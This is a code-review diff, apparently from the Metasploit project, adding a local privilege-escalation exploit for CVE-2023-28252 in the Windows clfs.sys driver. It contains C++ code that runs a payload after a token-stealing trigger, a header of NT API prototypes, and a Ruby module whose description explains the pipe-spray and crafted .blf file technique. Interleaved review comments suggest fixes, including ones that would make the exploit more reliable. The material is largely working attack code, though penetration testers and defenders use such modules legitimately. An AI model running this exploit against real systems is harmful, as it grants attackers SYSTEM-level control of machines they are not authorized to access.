HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pPayload, NULL, 0, NULL);
if (!hThread) {
// Handle thread creation error
CloseHandle(hDupToken);
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
exit;
}

// Wait for the thread to finish if needed
WaitForSingleObject(hThread, INFINITE);

// Clean up handles and allocated memory
CloseHandle(hThread);
CloseHandle(hDupToken);
VirtualFree(pPayload, 0, MEM_RELEASE);
}


DWORD Exploit(PMSF_PAYLOAD pPayload) {

clfs_eop ce = clfs_eop::clfs_eop();

ce.getVirtualAddress();
ce.InitEnvironment();
ce.doFirstAlloc();
ce.createInitialLogFile();
ce.fun_prepare();
ce.to_trigger();

ExecutePayload(pPayload);

return 0;
}
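Review bot: the four `exit;` statements in ExecutePayload are bugs, not early returns: a bare function name is an expression that evaluates to the address of `exit` and is discarded (MSVC warns about the missing argument list but compiles it), so after a failed VirtualAlloc the code falls through into CopyMemory with pPayload == NULL. Replace each with `return;` (the first one has nothing to free). The OpenProcessToken/DuplicateToken block produces hDupToken, which is only ever closed and never applied to a thread, so either drop it or use it. In Exploit, `clfs_eop ce = clfs_eop::clfs_eop();` can simply be `clfs_eop ce;`, and the int results of doFirstAlloc and createInitialLogFile are ignored: if the spray or trigger step fails, ExecutePayload still runs the payload without the stolen token; check those return values and return non-zero instead of falling through.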
121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.h
vendored
Executable file
@ -0,0 +1,121 @@
#pragma once
#include <Windows.h>

#pragma once
#include "ntos.h"

#include <windows.h>
#include <ntstatus.h>

#ifndef NTSTATUS
typedef long NTSTATUS;
#endif

typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

typedef NTSTATUS(__stdcall* fNtCallbackReturn)(
PVOID Result,
ULONG ResultLength,
NTSTATUS CallbackStateus
);

typedef NTSTATUS(__stdcall* fNtUserConsoleControl)(
DWORD ConsoleCtrl,
PVOID ConsoleCtrlInfo,
ULONG ConsoleCtrlInfoLength
);

typedef NTSTATUS(__stdcall* fNtUserMessageCall)(
HWND hWnd,
UINT msg,
WPARAM wParam,
LPARAM lParam,
ULONG_PTR ResultInfo,
DWORD dwType,
BOOL bAscii
);

typedef PVOID(__stdcall* fRtlAllocateHeap)(
PVOID HeapHandle,
ULONG Flags,
SIZE_T Size
);

typedef VOID(__stdcall* fRtlGetNtVersionNumbers)(
DWORD* MajorVersion,
DWORD* MinorVersion,
DWORD* BuildNumber
);

#define TYPE_WINDOW 1
typedef PVOID(__stdcall* fHMValidateHandle)(HANDLE hHandle, DWORD dwType);

//
// Taken from ntdef.h
//



//
// Taken from wdm.h
//

typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

typedef NTSTATUS(__stdcall* fNtCreateFile)(
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER AllocationSize,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions,
PVOID EaBuffer,
ULONG EaLength
);

typedef NTSTATUS(__stdcall* fNtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine, // PIO_APC_ROUTINE is just a pointer to a function
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);

typedef NTSTATUS(__stdcall* fNtCreateIoCompletion)(
PHANDLE IoCompletionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG NumberOfConcurrentThreads
);

typedef NTSTATUS(__stdcall* fNtSetIoCompletion)(
HANDLE IoCompletionHandle,
ULONG CompletionKey,
PIO_STATUS_BLOCK IoStatusBlock,
NTSTATUS CompletionStatus,
ULONG NumberOfBytesTransferred
);


class exploit {
public:
DWORD Exploit(PVOID pPayload);
};
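Review bot: the `class exploit { DWORD Exploit(PVOID pPayload); }` declaration at the end of this header does not correspond to anything the source file defines; the .cpp provides a free function `DWORD Exploit(PMSF_PAYLOAD pPayload)`, so the member is declared with a different parameter type and never implemented. Either drop the class or make the definition a member with a matching signature. The header also repeats itself: `#pragma once` appears twice, the Windows header is included twice (`<Windows.h>` and later `<windows.h>`), and the `fNtQuerySystemInformation` typedef is declared once near the top and again under "Taken from wdm.h" with an identical body (legal as a redeclaration of the same type, but one copy should go). The "Taken from ntdef.h" comment introduces an empty block, and `CallbackStateus` in fNtCallbackReturn is a typo for `CallbackStatus`. Several prototypes here (fNtUserConsoleControl, fNtUserMessageCall, fHMValidateHandle, the NtCreateIoCompletion/NtSetIoCompletion pair) are not used by any code visible in this diff; if they are leftovers from another exploit template they should be removed so the vendored source stays minimal.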
6455
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntos.h
vendored
Executable file
File diff suppressed because it is too large
BIN
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntoskrnl.lib
vendored
Executable file
Binary file not shown.
126
modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb
Normal file
@ -0,0 +1,126 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::Windows::Version

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',
'Description' => %q{
A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on
Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.

The clfs.sys driver contains a function CreateLogFile that is used to create
open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which
contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a
.blf file. However, these files can be edited with CreateFileA or with fopen and then modified with
WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.

This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique
mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of
bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe
that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially
crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.

The exploits creates a controlled memory space by first looping over the CreatePipe function to
to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of
pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the
0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.

This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in
depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).
},
'License' => MSF_LICENSE,
'Author' => [
'Ricardo Narvaja', # Original PoC (@ricnar456)
'Esteban.kazimirow', # Original PoC (@solidclt)
'jheysel-r7' # msf module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'References' => [
[ 'CVE', '2023-28252' ],
[ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]
],
'DisclosureDate' => '2023-04-11',
'DefaultTarget' => 0,
'Privileged' => true,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed
'SideEffects' => []
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_railgun_api
]
}
}
}
)
)
end

def check
unless session.platform == 'windows'
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end

file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'
unless file?(file_path)
return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')
end

version = get_version_info
if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022
return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")
end

CheckCode::Safe
end

def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end

if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end

encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)

print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
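Review bot: the build test in `check` is wider than the description it sits next to: `version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2)` also accepts 20H2 and 21H1, while the Description (and the module docs) list only Windows 10 21H2; either record the extra builds as tested or narrow this to `== Msf::WindowsVersion::Win10_21H2`. The Description also says "Windows Server 20348" where the docs say "Windows Server 2022 (Build 20348)". Because the check keys only on the OS build number, a host that already has the fix for CVE-2023-28252 installed still returns `Appears`; returning CheckCode::Detected, or comparing the file version of the clfs.sys found at `file_path` (which is currently only tested for existence), would make the result honest. Minor wording in the Description hunk: "makes use to two" should be "makes use of two", "specially crafted read the SYSTEM token" is missing "to", "The exploits creates" should be "The exploit creates", and "to / to create" doubles the word across the line break. The `target.arch.first == ARCH_X86` branches in `exploit` can never fire because the only target is x64, so they can be dropped.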